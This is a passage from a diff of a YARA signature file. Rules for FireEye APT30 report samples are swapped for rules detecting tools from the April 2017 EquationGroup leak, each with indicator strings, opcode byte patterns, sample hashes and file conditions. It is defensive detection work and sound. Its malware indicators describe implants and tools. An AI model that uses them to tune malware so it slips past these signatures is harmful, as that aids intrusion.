+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
+		id = "c479964c-3122-511d-9410-bc5d890f1489"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L351-L367"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2581-L2600"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b0740175d20eab79a5d62cdbe0ee1a89212a8472"
-		logic_hash = "e5f352b1aa643b9508c01bbe921197ebd8992ec94036b869c55970f0177164d3"
+		logic_hash = "2ba0f5ada13bd8c71836f26e278c334fdbf2578eac189852befee7a81c07e169"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c7dd49b98f399072c2619758455e8b11c6ee4694bb46b2b423fa89f39b185a97"
+		hash2 = "f6b723ef985dfc23202870f56452581a08ecbce85daf8dc7db4491adaa4f6e8f"
 
 	strings:
-		$s0 = "AdobeReader.exe" fullword wide
-		$s4 = "10.1.7.27" fullword wide
-		$s5 = "Copyright 1984-2012 Adobe Systems Incorporated and its licensors. All ri" wide
-		$s8 = "Adobe Reader" fullword wide
+		$s1 = "S-%u-%u" fullword ascii
+		$s2 = "Copyright (C) Microsoft" fullword wide
+		$op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 }
+		$op2 = { 44 24 4e 41 88 5c 24 4f ff }
+		$op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_15 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Put_Implant9X : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
+		id = "73cafd51-8b0d-59e3-966d-2f5de65953a7"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L369-L387"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2602-L2618"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7a8576804a2bbe4e5d05d1718f90b6a4332df027"
-		logic_hash = "5179f39bdcb064f55479ad147a019dd0b3874783c6bad650e84cfd9d0430bb70"
+		logic_hash = "e79a59e400aac544dc1160d5898e3053f88f7d5bc142440177526187650484e7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8fcc98d63504bbacdeba0c1e8df82f7c4182febdf9b08c578d1195b72d7e3d5f"
 
 	strings:
-		$s0 = "\\Windo" ascii
-		$s2 = "HHOSTR" ascii
-		$s3 = "Softwa]\\Mic" ascii
-		$s4 = "Startup'T" fullword ascii
-		$s17 = "help32Snapshot0L" fullword ascii
-		$s18 = "TimUmoveH" ascii
+		$s1 = "3&3.3<3A3F3K3V3c3m3" fullword ascii
+		$op1 = { c9 c2 08 00 b8 72 1c 00 68 e8 c9 fb ff ff 51 56 }
+		$op2 = { 40 1b c9 23 c8 03 c8 38 5d 14 74 05 6a 03 58 eb }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 2 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_16 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Promiscdetect_Safe : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
+		id = "d6103861-b332-5c21-8408-76b512012689"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L389-L407"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2620-L2635"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "066d06ac08b48d3382d46bbeda6ad411b6d6130e"
-		logic_hash = "59ea90ac0590bd87a48fabf1a3fa7ece31560b980b738a34227937bbf82a1c55"
+		logic_hash = "4b8c2e9a00af4e6aed7f603dee0439357e3389180fbd2e83d6809e76dc7d0428"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6070d8199061870387bb7796fb8ccccc4d6bafed6718cbc3a02a60c6dc1af847"
 
 	strings:
-		$s0 = "\\Temp1020.txt" ascii
-		$s1 = "cmcbqyjs" fullword ascii
-		$s2 = "SPVSWh\\" fullword ascii
-		$s4 = "PSShxw@" fullword ascii
-		$s5 = "VWhHw@" fullword ascii
-		$s7 = "SVWhHw@" fullword ascii
+		$s1 = "running on this computer!" fullword ascii
+		$s2 = "- Promiscuous (capture all packets on the network)" fullword ascii
+		$s3 = "Active filter for the adapter:" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_A : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Packetscan_Implant : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6b851d94-d3bd-5c76-8fd0-adb42b3fab73"
-		date = "2015-04-13"
+		id = "e49695d9-15ae-53a6-955c-c68402e241a2"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L409-L429"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2637-L2652"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c20660a8a55c6c6cb058fb233e0b29e1e4be2683181dbdfb06e17037d0ed8c31"
+		logic_hash = "aa2106d2aad3e81c864181c851574f76f48cd4fe48bb3327135f2956d271dfde"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9f49aa1090fa478b9857e15695be4a89f8f3e594"
-		hash2 = "396116cfb51cee090822913942f6ccf81856c2fb"
-		hash3 = "fef9c3b4b35c226501f7d60816bb00331a904d5b"
-		hash4 = "7c9a13f1fdd6452fb6d62067f958bfc5fec1d24e"
-		hash5 = "5257ba027abe3a2cf397bfcae87b13ab9c1e9019"
+		hash1 = "9b97cac66d73a9d268a15e47f84b3968b1f7d3d6b68302775d27b99a56fbb75a"
 
 	strings:
-		$s5 = "WPVWhhiA" fullword ascii
-		$s6 = "VPWVhhiA" fullword ascii
-		$s11 = "VPhhiA" fullword ascii
-		$s12 = "uUhXiA" fullword ascii
+		$op0 = { e9 ef fe ff ff ff b5 c0 ef ff ff 8d 85 c8 ef ff }
+		$op1 = { c9 c2 04 00 b8 34 26 00 68 e8 40 05 00 00 51 56 }
+		$op2 = { e9 0b ff ff ff 8b 45 10 8d 4d c0 89 58 08 c6 45 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_17 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setports : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
+		id = "6dc67951-714e-57d9-b34a-0006348b6b10"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L431-L445"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2654-L2668"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c3aa52ff1d19e8fc6704777caf7c5bd120056845"
-		logic_hash = "43913151325fbce993dbfec0acf64ca835b12270c47156ae81b0ce4f32c7bde1"
+		logic_hash = "b2c61f6ca2d59d5e596e7c5c87ed3476d957763daeaf41e6f356bacf26415faf"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "722d3cf03908629bc947c4cca7ce3d6b80590a04616f9df8f05c02de2d482fb2"
 
 	strings:
-		$s1 = "Nkfvtyvn}]ty}ztU" fullword ascii
-		$s4 = "IEXPL0RE" fullword ascii
+		$s1 = "USAGE: SetPorts <input file> <output file> <version> <port1> [port2] [port3] [port4] [port5]" fullword ascii
+		$s2 = "Valid versions are:  1 = PC 1.2   2 = PC 1.2 (24 hour)" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_18 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Grdo_Filescanner_Implant : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L446-L466"
+		id = "79a3cc02-0cda-59e2-8698-29a6cb0a3061"
+		date = "2017-04-15"
+		modified = "2023-01-06"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2670-L2686"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "355436a16d7a2eba8a284b63bb252a8bb1644751"
-		logic_hash = "d20f1d1b7b43defc36c7b1f99f14ed9e73e770b6f43d0ad92110cf9178b35b15"
+		logic_hash = "ae88d27f41dd4888c445c654c919b3862fe3fc8c92aef816b22b2fb408a49cce"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8d2e43567e1360714c4271b75c21a940f6b26a789aa0fce30c6478ae4ac587e4"
 
 	strings:
-		$s0 = "w.km-nyc.com" fullword ascii
-		$s1 = "tscv.exe" fullword ascii
-		$s2 = "Exit/app.htm" ascii
-		$s3 = "UBD:\\D" ascii
-		$s4 = "LastError" ascii
-		$s5 = "MicrosoftHaveAck" ascii
-		$s7 = "HHOSTR" ascii
-		$s20 = "XPL0RE." ascii
+		$s1 = "system32\\winsrv.dll" fullword wide
+		$s2 = "raw_open CreateFile error" fullword ascii
+		$s3 = "\\dllcache\\" wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_G : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Msgks_Mskgu : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "34269de3-4559-58a5-a621-0ad72857dc9e"
-		date = "2015-04-13"
+		id = "1692848d-a8db-5c11-9dc4-f1b0c45a78c3"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L468-L489"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2688-L2704"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1612b392d6145bfb0c43f8a48d78c75f"
-		hash = "53f1358cbc298da96ec56e9a08851b4b"
-		hash = "c2acc9fc9b0f050ec2103d3ba9cb11c0"
-		hash = "f18be055fae2490221c926e2ad55ab11"
-		logic_hash = "6926d73839958acd06835c1943edb150a0f60cdc269fac053531a0e0483e0521"
+		logic_hash = "d3a230d29997ab247db2b7a2a0f369206513a98c16f744e2fb1fca6495d5e36b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7b4986aee8f5c4dca255431902907b36408f528f6c0f7d7fa21f079fa0a42e09"
+		hash2 = "ef906b8a8ad9dca7407e0a467b32d7f7cf32814210964be2bfb5b0e6d2ca1998"
 
 	strings:
-		$s0 = "%s\\%s\\%s=%s" fullword ascii
-		$s1 = "Copy File %s OK!" fullword ascii
-		$s2 = "%s Space:%uM,FreeSpace:%uM" fullword ascii
-		$s4 = "open=%s" fullword ascii
-		$s5 = "Maybe a Encrypted Flash Disk" fullword ascii
-		$s12 = "%04u-%02u-%02u %02u:%02u:%02u" fullword ascii
+		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
+		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
+		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_19 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ifconfig_Target : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-03"
-		modified = "2023-01-06"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L491-L517"
+		id = "db8ec377-a9f6-5d75-a123-aa0365d98065"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2706-L2722"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cfa438449715b61bffa20130df8af778ef011e15"
-		logic_hash = "9127ae31c5b818a2759f9d33c74c8631079539e7fa8e49e5514b016df2624065"
+		logic_hash = "e88f589bed7830a1be81c85c9eb77b7f5c14bef2f0f1b3be6293aa9c5e870278"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1ebfc0ce7139db43ddacf4a9af2cb83a407d3d1221931d359ee40588cfd0d02b"
 
 	strings:
-		$s0 = "C:\\Program Files\\Common Files\\System\\wab32" fullword ascii
-		$s1 = "%s,Volume:%s,Type:%s,TotalSize:%uMB,FreeSize:%uMB" fullword ascii
-		$s2 = "\\TEMP\\" ascii
-		$s3 = "\\Temporary Internet Files\\" ascii
-		$s5 = "%s TotalSize:%u Bytes" fullword ascii
-		$s6 = "This Disk Maybe a Encrypted Flash Disk!" fullword ascii
-		$s7 = "User:%-32s" fullword ascii
-		$s8 = "\\Desktop\\" ascii
-		$s9 = "%s.%u_%u" fullword ascii
-		$s10 = "Nick:%-32s" fullword ascii
-		$s11 = "E-mail:%-32s" fullword ascii
-		$s13 = "%04u-%02u-%02u %02u:%02u:%02u" fullword ascii
-		$s14 = "Type:%-8s" fullword ascii
+		$s1 = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\%hs" fullword wide
+		$op1 = { 0f be 37 85 f6 0f 85 4e ff ff ff 45 85 ed 74 21 }
+		$op2 = { 4c 8d 44 24 34 48 8d 57 08 41 8d 49 07 e8 a6 4b }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and 8 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_E_V2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40897687-fb17-568e-9907-e9588a53bbe0"
-		date = "2015-04-13"
+		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L519-L535"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2724-L2739"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "eca53a9f6251ddf438508b28d8a483f91b99a3fd"
-		logic_hash = "25a7e5780f56b4f9cfb76494926c446a39a88bef2cda82b31e6de2b85c5edbda"
+		logic_hash = "3ee7a1284e2abd0282606c22b9112bd1af536e5fd48ef27e8d9216da8e1fb1c5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6"
 
 	strings:
-		$s0 = "Nkfvtyvn}duf_Z}{Ys" fullword ascii
-		$s1 = "Nkfvtyvn}*Zrswru1i" fullword ascii
-		$s2 = "Nkfvtyvn}duf_Z}{V" fullword ascii
-		$s3 = "Nkfvtyvn}*ZrswrumT\\b" fullword ascii
+		$op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 }
+		$op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 }
+		$op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_20 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dsz_Implant : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "91246101-246b-5da9-9e55-7f361d1f6437"
-		date = "2015-04-13"
+		id = "febc8654-7dc3-5c8b-a53c-f8d7dc29b14b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L537-L557"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2741-L2755"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b1c37632e604a5d1f430c9351f87eb9e8ea911c0"
-		logic_hash = "f94cbd4b8e7ba302db9ac4ef3617bd68aa0aa1ee3cfc6dfee4621223bbdae3c5"
+		logic_hash = "3d76131a42aed642a8c54076544488a8d24ec16416469813324541d72e30101b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fbe103fac45abe4e3638055a3cac5e7009166f626cf2d3049fb46f3b53c1057f"
+		hash2 = "ad1dddd11b664b7c3ad6108178a8dade0a6d9795358c4a7cedbe789c62016670"
 
 	strings:
-		$s0 = "dizhi.gif" fullword ascii
-		$s2 = "Mozilla/u" ascii
-		$s3 = "XicrosoftHaveAck" ascii
-		$s4 = "flyeagles" ascii
-		$s10 = "iexplore." ascii
-		$s13 = "WindowsGV" fullword ascii
-		$s16 = "CatePipe" fullword ascii
-		$s17 = "'QWERTY:/webpage3" fullword ascii
+		$s1 = "%02u:%02u:%02u.%03u-%4u: " fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_21 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Genkey : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "72005b40-91f7-5661-9478-8680f999b245"
-		date = "2015-04-13"
+		id = "54e15017-a2f7-5135-af88-b13ea5866c5f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L559-L575"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2757-L2770"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d315daa61126616a79a8582145777d8a1565c615"
-		logic_hash = "e3e431bb6915d99b8aa1915419b60ba47372005b9b4994a924746a91bad80310"
+		logic_hash = "cdaa33645d0ea614891fc0579937e983b8b4f6c4830191518dc8272791dcc8df"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b6f100b21da4f7e3927b03b8b5f0c595703b769d5698c835972ca0c81699ff71"
 
 	strings:
-		$s0 = "Service.dll" fullword ascii
-		$s1 = "(%s:%s %s)" fullword ascii
-		$s2 = "%s \"%s\",%s %s" fullword ascii
-		$s5 = "Proxy-%s:%u" fullword ascii
+		$x1 = "* PrivateEncrypt -> PublicDecrypt FAILED" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_22 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Wmi_Implant : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c1b3dd2-4383-51a2-9185-2365a4d1e784"
-		date = "2015-04-13"
+		id = "e058d2cc-b963-55bc-9bdd-468f64fe8e6f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L577-L595"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2772-L2785"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0d17a58c24753e5f8fd5276f62c8c7394d8e1481"
-		logic_hash = "88a45d248eba7b9776e2e7d345d2948e00a94a7e359acb89d1943be55ab342ad"
+		logic_hash = "69754b6f26292aa1a457c71d079d934ce75794624c38e9d19c84ceb77a5fb26d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "de08d6c382faaae2b4b41b448b26d82d04a8f25375c712c12013cb0fac3bc704"
 
 	strings:
-		$s1 = "(\\TEMP" fullword ascii
-		$s2 = "Windows\\Cur" fullword ascii
-		$s3 = "LSSAS.exeJ" fullword ascii
-		$s4 = "QC:\\WINDOWS" fullword ascii
-		$s5 = "System Volume" fullword ascii
-		$s8 = "PROGRAM FILE" fullword ascii
+		$x1 = "SELECT ProcessId,Description,ExecutablePath FROM Win32_Process" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_F : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Clocksvc : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cff8b921-9afc-5a52-84cb-825de33fc86e"
-		date = "2015-04-13"
+		id = "ec0e90a5-1359-55e5-9165-494f90431247"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L597-L615"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2787-L2807"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4997b52e0cc12a1a0c84cec3565dd9e6b486ccef4eb8791c566c7a534d36e3ff"
+		logic_hash = "04cdd8e4ca9df0231ca66caa8083eff1fe0834cdedc4360fce0a934970a6d162"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "09010917cd00dc8ddd21aeb066877aa2"
-		hash2 = "4c10a1efed25b828e4785d9526507fbc"
